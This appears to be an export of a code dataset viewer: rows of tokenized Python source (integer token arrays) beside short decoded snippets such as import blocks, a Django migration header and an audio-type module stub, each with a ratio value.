220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
17,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
1495,
11,
7618,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
1679,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
1679,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
1679,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
18,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
3365,
11,
9919,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
7618,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
7618,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
7618,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
604,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
4531,
11,
13108,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
9919,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
9919,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
9919,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
642,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
12762,
11,
24356,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
13108,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
13108,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
13108,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
718,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
21139,
11,
24063,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
24356,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
24356,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
24356,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
767,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
21273,
11,
23378,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
24063,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
24063,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
24063,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
807,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
14656,
11,
28581,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
23378,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
23378,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
23378,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
860,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
24294,
11,
19884,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
28581,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
28581,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
28581,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
838,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
19782,
11,
30453,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
19884,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
19884,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
19884,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
1367,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
28896,
11,
17759,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
30453,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
30453,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
30453,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
1105,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
11645,
11,
25829,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
17759,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
17759,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
17759,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
3797,
6624,
1511,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
23195,
11,
41235,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
532,
25829,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
532,
25829,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
532,
25829,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
13033,
796,
18896,
7,
37659,
13,
3003,
7,
13033,
62,
85,
1875,
657,
38381,
15,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3709,
13,
33295,
7,
9186,
7,
9246,
11,
28953,
11,
5046,
11,
275,
3524,
11,
997,
62,
13033,
4008,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
27039,
17816,
34574,
602,
6,
4083,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
20337,
10354,
266,
9,
71,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
65,
3524,
10354,
275,
3524,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22872,
62,
312,
10354,
3797,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
850,
62,
9630,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
24874,
62,
312,
10354,
5166,
62,
312,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
9060,
62,
312,
10354,
997,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2304,
3986,
10354,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
7635,
10354,
3918,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22510,
62,
2539,
13033,
10354,
22510,
62,
13033,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2539,
13033,
10354,
13033,
13,
83,
349,
396,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
6,
325,
5154,
341,
10354,
384,
70,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
6536,
17,
62,
312,
11,
636,
11,
3812,
796,
2769,
25265,
17,
3919,
993,
7,
23814,
11,
357,
10394,
11,
6001,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
329,
1332,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
611,
6536,
17,
62,
312,
6624,
362,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
220,
220,
220,
220,
649,
62,
6978,
796,
2939,
62,
3672,
13,
33491,
10786,
9060,
3256,
9376,
17,
62,
3672,
58,
22872,
17,
62,
312,
60,
1343,
31051,
6,
1343,
636,
62,
3672,
58,
3911,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
220,
220,
220,
220,
649,
62,
6978,
796,
2939,
62,
3672,
13,
33491,
10786,
9060,
3256,
9376,
17,
62,
3672,
58,
22872,
17,
62,
312,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4423,
346,
13,
21084,
7,
9060,
62,
3672,
11,
220,
649,
62,
6978,
8,
198,
220,
220,
220,
220,
220,
220,
220,
636,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
3812,
796,
657,
628,
220,
220,
220,
220,
220,
220,
220,
850,
62,
9630,
17,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
27039,
17816,
34574,
602,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
9060,
62,
312,
10354,
997,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
850,
62,
9630,
17,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22872,
17,
62,
312,
10354,
4738,
13,
25192,
600,
7,
16,
11,
642,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
3911,
10354,
636,
611,
636,
318,
407,
6045,
2073,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
83,
46138,
10354,
3812,
611,
3812,
318,
407,
6045,
2073,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46430,
10354,
352,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
352,
1724,
8856,
262,
220,
1255,
198,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
198,
17752,
62,
3672,
796,
6808,
62,
15908,
1343,
705,
4871,
2649,
62,
46430,
62,
1129,
86,
13,
17752,
6,
198,
4480,
1280,
7,
17752,
62,
3672,
11,
705,
86,
11537,
355,
277,
25,
198,
220,
33918,
13,
39455,
7,
19608,
292,
316,
11,
277,
8,
628,
628,
628
] | 2.046066 | 17,779 |
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from typing import TYPE_CHECKING
from feishu.dt_drive import DriveDocFileMeta
from feishu.dt_help import make_datatype
if TYPE_CHECKING:
from feishu.api import OpenLark
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
198,
6738,
19720,
1330,
41876,
62,
50084,
2751,
198,
198,
6738,
730,
680,
84,
13,
28664,
62,
19472,
1330,
9974,
23579,
8979,
48526,
198,
6738,
730,
680,
84,
13,
28664,
62,
16794,
1330,
787,
62,
19608,
265,
2981,
198,
198,
361,
41876,
62,
50084,
2751,
25,
198,
220,
220,
220,
422,
730,
680,
84,
13,
15042,
1330,
4946,
43,
668,
628
] | 3.043956 | 91 |
from typing import List
import numpy as np
EMPTY_SYMBOL = "_"
#Validators
| [
6738,
19720,
1330,
7343,
198,
11748,
299,
32152,
355,
45941,
628,
198,
39494,
9936,
62,
23060,
10744,
3535,
796,
45434,
1,
628,
220,
220,
220,
1303,
47139,
2024,
628,
628,
220,
220,
220,
220,
220,
220,
220,
220,
628,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220
] | 2.057692 | 52 |
import datetime
print(datetime.datetime.now().timetz())
| [
11748,
4818,
8079,
198,
4798,
7,
19608,
8079,
13,
19608,
8079,
13,
2197,
22446,
16514,
23773,
28955,
198
] | 3.111111 | 18 |
#!/usr/bin/env python3
'''
This AudioType only prints some info onto the console
'''
import logging
from audiotype.IAudioType import IAudioType | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
7061,
6,
198,
1212,
13491,
6030,
691,
20842,
617,
7508,
4291,
262,
8624,
198,
7061,
6,
198,
198,
11748,
18931,
198,
6738,
2709,
5151,
2981,
13,
3539,
463,
952,
6030,
1330,
314,
21206,
6030
] | 3.222222 | 45 |
# Generated by Django 3.0.6 on 2020-06-06 13:25
import backend.storage_backends
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
513,
13,
15,
13,
21,
319,
12131,
12,
3312,
12,
3312,
1511,
25,
1495,
198,
198,
11748,
30203,
13,
35350,
62,
1891,
2412,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 3.075 | 40 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.